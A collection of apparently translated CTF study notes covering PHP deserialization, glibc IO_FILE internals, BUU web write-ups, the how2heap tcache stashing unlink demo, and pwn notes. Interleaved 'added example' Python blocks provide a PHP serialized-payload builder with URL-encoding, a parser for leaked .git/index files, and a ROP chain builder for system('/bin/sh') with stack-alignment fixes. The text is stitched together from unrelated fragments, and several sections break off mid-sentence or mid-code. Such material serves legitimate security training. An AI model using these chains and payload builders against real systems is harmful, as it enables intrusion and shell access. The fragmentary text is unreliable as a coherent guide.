Notes on PHP deserialization

1. Deserialization. Demo:

<?php
class test {
    private $flag = "flag{233}";
    protected $ccc = "ccc";
    public $a = "aaa";
    static $b = "bbb";
}
$test = new test;
$data = serialize($test);
echo $data;
?>

Output:

O:4:"test":3:{s:10:"testflag";s:9:"flag{233}";s:6:"*ccc";s:3:"ccc";s:1:"a";s:3:"aaa";}

(Only three properties are emitted: the static $b is class state, not object state, and serialize() skips it.) Note that testflag is only 8 characters long, yet the serialized form says its length is 10. Capture the response in a proxy and the reason is visible: the class name is wrapped in invisible characters on both sides, which are %00 (NUL bytes). This is because flag is private,
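The mangling described above, as an added example (not code from the original page): a small Python serializer that produces PHP's O:...:{...} format with the correct "\0Class\0prop" (private) and "\0*\0prop" (protected) property names, so the length fields come out right, plus a helper that URL-encodes the NUL bytes as %00 for transport in a request parameter. The sample class mirrors the page's `test` class and is constructed here.

```python
from urllib.parse import quote

# Constructed sample mirroring the page's `test` class: (name, visibility, value).
# static $b is deliberately absent: PHP never serializes static properties.
TEST_CLASS = ("test", [
    ("flag", "private", "flag{233}"),
    ("ccc", "protected", "ccc"),
    ("a", "public", "aaa"),
])


def mangle(cls: str, name: str, visibility: str) -> str:
    """Apply PHP's property-name mangling.

    private   -> "\\0<ClassName>\\0<name>"
    protected -> "\\0*\\0<name>"
    public    -> "<name>"
    The NUL bytes are what shows up as %00 once the payload is URL-encoded,
    and they are why s:10:"testflag" looks 8 characters long on screen.
    """
    if visibility == "private":
        return "\x00" + cls + "\x00" + name
    if visibility == "protected":
        return "\x00*\x00" + name
    if visibility == "public":
        return name
    raise ValueError(f"unknown visibility {visibility!r}")


def ser(value) -> str:
    """Serialize a scalar, list or dict the way PHP's serialize() does."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value};"
    if isinstance(value, str):
        # PHP counts bytes, not characters, so measure the encoded form.
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, (list, dict)):
        items = value.items() if isinstance(value, dict) else enumerate(value)
        body = "".join(ser(k) + ser(v) for k, v in items)
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"cannot serialize {type(value).__name__}")


def serialize_object(cls: str, props) -> str:
    """Emit O:<len>:"<cls>":<n>:{...} with correctly mangled property names."""
    body = "".join(ser(mangle(cls, n, vis)) + ser(val) for n, vis, val in props)
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def visible_length(name: str) -> int:
    """Length of a property name as a terminal shows it (NUL bytes are invisible)."""
    return len(name.replace("\x00", ""))


def as_url_param(payload: str) -> str:
    """URL-encode so the NUL bytes survive as %00 inside a GET/POST parameter."""
    return quote(payload, safe="")
```

If a payload is pasted into a browser or a script without URL-encoding, the NUL bytes are usually dropped and the declared lengths no longer match the data, so unserialize() fails silently; always send the output of as_url_param(), or build the bytes with the NULs present.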

IO_FILE debugging and walkthrough

Starting on __IO_FILE. We will go through the source of the IO functions fopen, fwrite, fread and so on in turn. IO_FILE: fopen in detail. Demo program:

#include <stdio.h>
#include <stdlib.h>   /* malloc */
int main() {
    FILE *fp = fopen("test", "wb");
    char *ptr = malloc(0x20);
    return 0;
}

Source analysis: stepping into it shows that fopen is actually the _IO_new_fopen function. It calls

BUU WEB write-ups 0x30-0x3F

0x30. [WUSTCTF2020]朴实无华 (code audit). robots.txt points to fAke_f1agggg.php, which holds a fake flag; looking at that response's headers reveals fl4g.php:

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);
//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想

BUU WEB write-ups 0x20-0x2F

0x20. [GXYCTF2019]禁止套娃. The topic is parameterless RCE. Two links first:
https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E4%BB%80%E4%B9%88%E6%98%AF%E6%97%A0%E5%8F%82%E6%95%B0%E5%87%BD%E6%95%B0RCE
http://www.heetian.com/info/827
I looked for a long time and found nothing; the write-up says it is a git leak, so:

┌──(kali㉿kali)-[~/GitHack]
└─$ python GitHack.py http://25ced3f5-75c8-4ac6-9d2c-9097371101ca.node4.buuoj.cn:81/
[+] Download and parse index file ...
error: Not a Git index file
┌──(kali㉿kali
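What GitHack is doing when it downloads and parses the index file, as an added example that is not part of the original post or of GitHack itself: a Python parser for a leaked .git/index (versions 2 and 3) that recovers the tracked paths, modes and object ids, and that rejects a non-index response the way the "Not a Git index file" message above does (the first four bytes must be DIRC). The index bytes it runs on are constructed inline by a companion builder, with timestamps and inode fields zeroed; the object ids and file names are made-up sample values.

```python
import hashlib
import struct

GIT_INDEX_MAGIC = b"DIRC"


def build_index_v2(entries):
    """Constructed sample: build a minimal version-2 .git/index from (mode, sha1_hex, path).

    ctime/mtime, dev/ino, uid/gid and size are zeroed; they do not matter for
    recovering paths and object ids from a leaked index.
    """
    body = struct.pack(">4sII", GIT_INDEX_MAGIC, 2, len(entries))
    for mode, sha_hex, path in entries:
        name = path.encode()
        fixed = struct.pack(">10I", 0, 0, 0, 0, 0, 0, mode, 0, 0, 0)  # mode is the 7th field
        flags = min(len(name), 0xFFF)          # low 12 bits of flags: name length
        entry = fixed + bytes.fromhex(sha_hex) + struct.pack(">H", flags) + name
        # 1-8 NUL bytes: pad the entry to a multiple of 8 while keeping the name NUL-terminated.
        entry += b"\x00" * (8 - len(entry) % 8)
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing SHA-1 over everything before it


def is_git_index(data: bytes) -> bool:
    """The check behind GitHack's 'Not a Git index file' (e.g. an HTML 404 came back)."""
    return len(data) >= 32 and data[:4] == GIT_INDEX_MAGIC


def parse_git_index(data: bytes):
    """Parse a leaked .git/index (v2/v3) into [(mode, sha1_hex, path), ...]."""
    if not is_git_index(data):
        raise ValueError("Not a Git index file")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):
        raise ValueError(f"unsupported index version {version}")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("index checksum mismatch (truncated or tampered download?)")
    entries, pos = [], 12
    for _ in range(count):
        start = pos
        mode = struct.unpack(">I", data[pos + 24:pos + 28])[0]
        sha_hex = data[pos + 40:pos + 60].hex()
        flags = struct.unpack(">H", data[pos + 60:pos + 62])[0]
        pos += 62
        if version == 3 and flags & 0x4000:    # extended flags word exists only in v3
            pos += 2
        name_len = flags & 0xFFF
        if name_len < 0xFFF:
            name = data[pos:pos + name_len]
        else:                                   # very long names: scan to the NUL
            name = data[pos:data.index(b"\x00", pos)]
        pos += len(name)
        # Skip the padding: entry size is rounded up to a multiple of 8 with at least one NUL.
        pos = start + ((pos - start + 8) // 8) * 8
        entries.append((mode, sha_hex, name.decode()))
    return entries


# Constructed sample index with two made-up entries (git keeps entries sorted by path).
SAMPLE_INDEX = build_index_v2([
    (0o100644, "e69de29bb2d1d6434b8b29ae775ad8c2e48c5391", "flag.php"),
    (0o100755, "da39a3ee5e6b4b0d3255bfef95601890afd80709", "index.php"),
])


def leaked_paths(data: bytes):
    """Just the file names, which is what you need to fetch .git/objects/xx/yyyy... next."""
    return [path for _, _, path in parse_git_index(data)]
```

Extensions (TREE, REUC and so on) may sit between the last entry and the checksum; the parser reads exactly `count` entries and leaves them alone, and the checksum still covers them. When the checksum fails on a real target, the download was usually cut off by the server or rewritten by a WAF, which is worth knowing before blaming the tool.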

Tcache stashing unlink attack: debugging notes

The code is the libc 2.27 version from how2heap:

#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
int main(){
    unsigned long stack_var[0x10] = {0};
    unsigned long *chunk_lis[0x10] = {0};
    unsigned long *target;
    setbuf(stdout, NULL);
    printf("This file demonstrates the stashing unlink attack on tcache.\n\n");
    printf("This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
    printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
    printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to

PWN challenge notes

1. Miscellaneous. On Ubuntu 18 the stack occasionally ends up misaligned (glibc 2.27's system() executes a movaps on the stack and faults unless rsp is 16-byte aligned on entry); adding an extra ret gadget or two to the chain shifts rsp by 8 per ret and fixes it. strlen(), when used to check the input length, stops at '\x00', whereas gets() does not truncate at '\x00'. sys, write, puts, printf. system("/bin/sh"):
p32(e.plt['system']) + p32(0xdeadbeef) + p32(sh_addr)
p64(pop_rdi_ret) + p64(sh_addr) + p64(e.sym['system'])
p64(pop_rdi_ret) + p64(bin_sh) + p64(sys_plt) + p64(0xdeadbeef)
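The three chains above plus the two notes about alignment and strlen, as an added example that is not part of the original post: a dependency-free Python chain builder for the i386 and amd64 system("/bin/sh") layouts, a helper that computes whether the amd64 chain needs an extra ret gadget before system() (the stack-alignment problem), and a helper that reports how many bytes a strlen()-based length check would actually see. All addresses (pop_rdi_ret, bin_sh, system, the ret gadget) are made-up placeholders; in a real exploit they come from the binary and the leaked libc.

```python
import struct
from typing import Optional


def p32(x: int) -> bytes:
    return struct.pack("<I", x)


def p64(x: int) -> bytes:
    return struct.pack("<Q", x)


def strlen_visible(payload: bytes) -> int:
    """Length a strlen()-based check sees: it stops at the first NUL byte.

    gets()/read() store the whole payload, so everything after that NUL still
    lands on the stack and is still consumed by the ret. Little-endian addresses
    such as 0x401196 contain NULs in their high bytes, so the check sees only a
    few bytes of the real chain.
    """
    nul = payload.find(b"\x00")
    return len(payload) if nul < 0 else nul


def chain_system_i386(padding: bytes, system_plt: int, bin_sh: int,
                      fake_ret: int = 0xdeadbeef) -> bytes:
    """i386 cdecl: system@plt, then the return address system() will return to,
    then its first argument (the page's p32(e.plt['system']) + p32(0xdeadbeef) + p32(sh_addr))."""
    return padding + p32(system_plt) + p32(fake_ret) + p32(bin_sh)


def chain_system_amd64(padding: bytes, pop_rdi_ret: int, bin_sh: int, system: int,
                       ret_gadget: Optional[int] = None) -> bytes:
    """amd64 SysV: the first argument travels in rdi, so pop it with a gadget first.

    If ret_gadget is given it is placed in front of the chain: a lone `ret`
    consumes 8 bytes of stack and otherwise changes nothing, which is exactly
    the "just ret a few more times" fix for the movaps crash in system().
    """
    chain = p64(pop_rdi_ret) + p64(bin_sh) + p64(system)
    if ret_gadget is not None:
        chain = p64(ret_gadget) + chain
    return padding + chain


def needs_alignment_ret(rsp_at_first_ret: int, words_before_system: int) -> bool:
    """Decide whether the amd64 chain needs one extra ret gadget.

    rsp_at_first_ret: value of rsp when the overflowed function executes its
    own ret (i.e. rsp points at the first word of the chain).
    words_before_system: chain words consumed before the address of system()
    (2 for pop_rdi_ret + bin_sh, 3 once a ret gadget is prepended).

    Each ret/pop consumes 8 bytes; the ret into system() consumes one more.
    The ABI puts rsp at 8 mod 16 on function entry (the caller aligned to 16,
    then `call` pushed 8). If that does not hold, system()'s movaps faults.
    """
    rsp_at_entry = rsp_at_first_ret + 8 * (words_before_system + 1)
    return rsp_at_entry % 16 != 8


def build_aligned_amd64(padding: bytes, rsp_at_first_ret: int, pop_rdi_ret: int,
                        bin_sh: int, system: int, ret_gadget: int) -> bytes:
    """Build the amd64 chain, inserting the ret gadget only when alignment requires it."""
    fix = ret_gadget if needs_alignment_ret(rsp_at_first_ret, 2) else None
    return chain_system_amd64(padding, pop_rdi_ret, bin_sh, system, ret_gadget=fix)
```

rsp_at_first_ret is read off in a debugger (break on the vulnerable function's ret and print $rsp); if the chain works without a leak of rsp, its low nibble is all that matters, since the check only depends on rsp mod 16.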